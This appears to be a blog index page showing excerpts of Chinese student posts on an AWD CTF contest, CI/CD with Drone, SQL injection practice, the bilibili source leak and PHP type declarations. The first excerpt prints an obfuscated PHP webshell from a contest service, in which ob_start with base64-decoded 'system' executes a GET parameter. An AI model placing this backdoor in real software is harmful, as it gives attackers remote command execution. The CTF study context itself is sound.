先从安全聊起 上周六协会 AWD，其中的 web1 中，有一个ob_start()的后门，具体代码是这样的： @ob_start(base64_decode('c3lzdGVt')); echo "$_GET[persistent]";...

今天六一，协会举办了大一第一次线下 AWD。 很开心最后我们组能获得第一。虽然上午被疯狂 Check Down 到自闭，但下午全靠 Moesang 大佬弹了四五个 Shell 疯狂cat /flag，同时 Y 也把 Pwn 给修好了。一下午就没怎么 Down 过，除了我中途修坏了一道 web...

编译型语言，就需要自动部署 我记得上学期刚注册助手 Gita 时，我还打趣地问过部长，助手什么时候上 CI / CD？ 当时部长说快了，这学期就上。 现在助手可以说每个项目完成后，都会使用 Drone 实现持续交付 / 持续集成。 对于前端来说，因为助手主要是用 Vue 做单页应用，...

Jarvis OJ 启动！！ 五一假期已经只剩一天了啊。真的快。 今天下午写 Go 时，室友在做南邮 CTF 上的 SQL 注入。那上面的两道 SQL 注入倒是挺基础的。但突然激起了我的兴趣 —— 想做做 SQL 注入了。 到 Jarvis OJ 上翻了下，还真有一道 ISCC 2016...

bilibili 干杯！🍻 最近 b 站源码泄露的事情闹得沸沸扬扬的，每天都有不同的瓜。昨天 GitHub 放出了 b 站写的 DMCA takedown 邮件。今天大家就在吐槽 b 站的小学级别英语了。 嘛，撇开这些事情不谈，b 站这次的源码泄露，确实让很多人开始注意到了 Golang 这门语言。...

类型声明 PHP 作为一个弱类型的语言，加入类型声明，真是一件大好事啊！这样确实能够减少很多 bug 的产生，今后也要试着养成写类型声明的习惯。 形参类型声明 function foo(int $num){ echo($num); } // foo(123); -> 123 //...